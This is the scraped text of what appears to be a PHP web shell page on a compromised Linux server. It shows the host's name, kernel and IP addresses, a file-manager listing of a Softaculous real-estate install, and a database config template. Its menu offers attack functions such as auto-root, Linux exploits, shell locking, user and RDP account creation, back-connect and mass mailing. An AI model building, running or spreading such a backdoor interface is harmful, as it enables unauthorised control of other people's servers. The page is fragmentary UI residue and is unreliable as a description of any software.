Linux server2.hpierson.com 3.10.0-1160.105.1.el7.x86_64 #1 SMP Thu Dec 7 15:39:45 UTC 2023 x86_64
Apache
: 162.0.216.123 | : 216.73.216.152
28 Domain
?7.4.33
yvffpqmy
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
softaculous /
realestate /
[ HOME SHELL ]
Name
Size
Permission
Action
?;
images
[ DIR ]
drwxr-xr-x
?;
php53
[ DIR ]
drwxr-xr-x
?;
php56
[ DIR ]
drwxr-xr-x
?;
php71
[ DIR ]
drwxr-xr-x
?;
php81
[ DIR ]
drwxr-xr-x
?;
php82
[ DIR ]
drwxr-xr-x
already_install
5
B
-rw-r--r--
changelog.txt
1.09
KB
-rw-r--r--
clone.php
3.16
KB
-rw-r--r--
cron.php
2.45
KB
-rw-r--r--
db.php
519
B
-rw-r--r--
edit.php
4.43
KB
-rw-r--r--
edit.xml
447
B
-rw-r--r--
fileindex.php
122
B
-rw-r--r--
import.php
3.79
KB
-rw-r--r--
info.xml
3.29
KB
-rw-r--r--
install.js
924
B
-rw-r--r--
install.php
5.38
KB
-rw-r--r--
install.xml
925
B
-rw-r--r--
md5
4.45
KB
-rw-r--r--
notes.txt
79
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : db.php
<?php return array ( 'components' => array ( 'db' => array ( 'class' => 'CDbConnection', 'connectionString' => 'mysql:host=[[softdbhost]];dbname=[[softdb]];port=3306', 'username' => '[[softdbuser]]', 'password' => '[[softdbpass]]', 'emulatePrepare' => true, 'charset' => 'utf8', 'enableParamLogging' => false, 'enableProfiling' => false, 'schemaCachingDuration' => 7200, 'tablePrefix' => '[[dbprefix]]', ), ), 'language' => 'en', ) ; ?>
Close